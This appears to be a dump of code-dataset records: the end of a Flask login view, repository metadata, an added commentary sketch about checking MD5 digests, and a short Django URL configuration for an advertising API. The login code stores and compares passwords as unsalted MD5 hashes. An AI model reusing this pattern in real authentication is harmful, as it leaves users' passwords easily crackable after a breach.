        error = 'Failed to parse request parameters: {error}'.format(error=e)
        app.logger.error(error)
        return gen_reply(code=400, info=error)

    password = md5(password.encode()).hexdigest()

    registered_user = \
        app.db.query(User).filter_by(username=str(username),
                                     password=str(password),
                                     enabled=True).first()

    if registered_user is None:
        app.logger.error('Username or password is incorrect (login: {}).'.format(username))
        return gen_reply(code=400, info='Incorrect login/password.')

    login_user(registered_user, remember=False)
    current_user.is_authenticated = True

    session['config'] = registered_user.get_config()
    session['user_id'] = registered_user.id
    session['login'] = registered_user.username
    session['email'] = registered_user.email
    session['full_name'] = registered_user.description

    user_session = {
        'user_id': session['user_id'],
        'login': session['login'],
        'email': session['email'],
        'config': session['config'],
        'full_name': session['full_name']
    }

    return gen_reply(data=user_session, info='Successful authentication.')


@app.route('/api/v1.0/logout', methods=['GET'])
def logout():
    logout_user()
    return gen_reply(code=200, info='User logged out.')
UTF-8
Python
false
false
4,386
py
45
login.py
27
0.624271
0.619837
0
133
31.218045
102
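The login.py record defines a Redis-backed session interface and compares md5 hex digests in its login() view, but neither the session wiring nor the stored-password format appears in the record. The sketch below shows only the credential comparison, using the standard library; the example password and the idea of registering the session interface via app.session_interface are assumptions rather than code from the repository.

# Minimal, runnable sketch of the credential check performed by the login()
# view above: the submitted password is md5-hashed and compared with the
# stored hex digest. (Attaching the record's RedisSessionInterface would be
# a separate step, e.g. app.session_interface = RedisSessionInterface();
# that wiring is not shown in the record and is an assumption.)
from hashlib import md5

def check_credentials(submitted_password, stored_hexdigest):
    # mirrors: password = md5(password.encode()).hexdigest()
    return md5(submitted_password.encode()).hexdigest() == stored_hexdigest

stored = md5("s3cret".encode()).hexdigest()   # what the users table would hold
assert check_credentials("s3cret", stored)
assert not check_credentials("wrong", stored)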
OPSRv/backend-mangust
4,801,773,443,131
ace675d8cf9fc162ba3bf2f0379d84a623f0f7cc
1bfdd8eb9857468ad44a522c5b81409f6e4e14e9
/advertising/urls.py
792a3f69bf35b478ec46bad4e5f7d208ac3dda44
[]
no_license
https://github.com/OPSRv/backend-mangust
75238af8e807b253971b1bee3f87d533fc7cbef3
7b40518be0b0c0bbed1da148f7ced18fe05e7be7
refs/heads/main
"2023-08-14T00:28:49.449000"
"2021-10-14T01:18:34"
"2021-10-14T01:18:34"
415,135,478
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns

from . import views

urlpatterns = [
    path('api/advertising/', views.AdvertisingList.as_view()),
]

urlpatterns = format_suffix_patterns(urlpatterns)
UTF-8
Python
false
false
244
py
33
urls.py
33
0.778689
0.778689
0
9
26.111111
62
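The urls.py record wraps its single route with format_suffix_patterns, which lets clients request the same endpoint with an optional format suffix (for example /api/advertising.json in addition to /api/advertising/). The repository's views.AdvertisingList is not included in this dump, so the sketch below of a matching Django REST Framework view is hypothetical; the Advertising model and serializer names are assumptions.

# Hypothetical sketch of the view that api/advertising/ could point at.
# The Advertising model and serializer are assumed names, not code from the
# repository; only the URL wiring above is taken from the record.
from rest_framework import generics, serializers
from .models import Advertising  # assumed model

class AdvertisingSerializer(serializers.ModelSerializer):
    class Meta:
        model = Advertising
        fields = "__all__"

class AdvertisingList(generics.ListAPIView):
    # read-only listing endpoint; DRF handles .json/.api format suffixes
    queryset = Advertising.objects.all()
    serializer_class = AdvertisingSerializer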
